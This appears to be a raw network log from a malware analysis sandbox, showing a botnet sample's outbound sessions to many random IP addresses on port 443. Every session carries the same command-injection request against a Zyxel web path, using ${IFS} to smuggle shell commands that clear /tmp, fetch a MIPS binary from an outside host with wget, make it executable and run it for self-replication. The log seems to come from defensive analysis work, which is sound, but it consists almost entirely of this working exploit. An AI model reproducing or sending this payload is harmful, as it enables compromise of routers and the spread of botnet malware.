                                                        Feb 2, 2024 06:21:01.768971920 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2468192.168.2.1439656190.198.186.127443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:01.768992901 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2469192.168.2.144438497.19.141.216443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:01.769036055 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2470192.168.2.145960438.204.53.111443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:01.769098043 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2471192.168.2.144738075.122.203.52443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:01.769104004 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2472192.168.2.1443226174.235.38.34443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:01.769145966 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2473192.168.2.1435168205.45.110.148443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:01.769171000 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2474192.168.2.1458502190.128.27.221443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:01.769208908 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2475192.168.2.1441960104.175.61.208443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:01.769256115 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2476192.168.2.1456750195.46.240.130443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:01.769303083 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2477192.168.2.143871265.248.135.188443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:01.769332886 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2478192.168.2.1445244143.248.112.11443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:01.769385099 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2479192.168.2.143331423.161.16.196443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:01.769417048 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2480192.168.2.143668820.247.251.69443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:01.769458055 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2481192.168.2.1446962141.129.88.112443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:01.769494057 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2482192.168.2.14471901.213.103.142443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:01.769536018 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2483192.168.2.144464870.137.12.136443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:01.769577980 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2484192.168.2.1454810124.227.7.38443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:01.769599915 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2485192.168.2.1441672196.90.99.251443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:01.769658089 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2486192.168.2.143526898.110.59.242443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:01.769694090 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2487192.168.2.1447576197.171.237.142443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:01.769725084 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2488192.168.2.1433104149.211.214.78443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:01.769766092 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2489192.168.2.1453972129.134.210.143443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:01.769813061 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2490192.168.2.144186894.242.42.152443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:01.769850016 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2491192.168.2.1447548142.138.121.79443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:01.769881010 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2492192.168.2.1447624170.208.65.3443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:01.769936085 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2493192.168.2.14576564.163.194.157443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:01.769957066 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2494192.168.2.1447440133.50.217.110443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:01.770008087 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2495192.168.2.1434528223.242.123.229443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:01.770045042 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2496192.168.2.146073842.229.242.234443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:01.770083904 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2497192.168.2.143625667.144.39.32443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:01.770157099 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2498192.168.2.145248268.206.127.132443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:01.770178080 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2499192.168.2.144585074.101.47.155443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:01.770201921 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2500192.168.2.146015665.115.6.124443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:01.770246983 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2501192.168.2.1447886155.74.228.206443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:01.770273924 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2502192.168.2.143577458.20.240.55443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:01.770328999 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2503192.168.2.1455296169.182.151.58443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:01.770371914 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2504192.168.2.1460000160.47.255.173443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:01.770390987 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2505192.168.2.144473894.71.36.24443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:01.770436049 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2506192.168.2.14367501.23.199.1443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:01.770478010 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2507192.168.2.1454620186.214.96.13443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:01.770533085 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2508192.168.2.1441146109.4.111.155443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:01.770559072 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2509192.168.2.1437610202.78.122.205443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:01.770593882 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2510192.168.2.1453236150.149.241.201443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:01.770627022 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2511192.168.2.145939848.177.61.145443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:01.770672083 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2512192.168.2.1446726178.164.37.12443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:01.770695925 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2513192.168.2.143554071.44.175.106443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:01.770735025 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2514192.168.2.1438452217.78.28.122443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:01.770768881 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2515192.168.2.144078074.94.65.112443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:01.770821095 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2516192.168.2.1439738102.177.123.33443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:01.770848989 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2517192.168.2.1439316197.224.105.167443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:01.770899057 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2518192.168.2.1451672197.117.4.3443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:01.770936966 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2519192.168.2.1445736109.153.190.151443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:01.770973921 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2520192.168.2.146067297.206.126.8443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:01.771012068 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2521192.168.2.1452702216.152.62.29443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:01.771069050 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2522192.168.2.145940448.174.41.30443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:01.771094084 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2523192.168.2.1451596122.157.242.68443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:01.771099091 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2524192.168.2.143812873.117.23.50443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:01.771162987 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2525192.168.2.1449856192.101.2.102443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:01.771213055 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2526192.168.2.1457782136.92.56.222443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:01.771238089 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2527192.168.2.1448094197.117.181.240443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:01.771275997 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2528192.168.2.1437096126.171.45.254443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:01.771311045 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2529192.168.2.145690420.28.63.91443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:01.771342039 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2530192.168.2.1434004154.22.173.2443
                                                        TimestampBytes transferredDirectionData
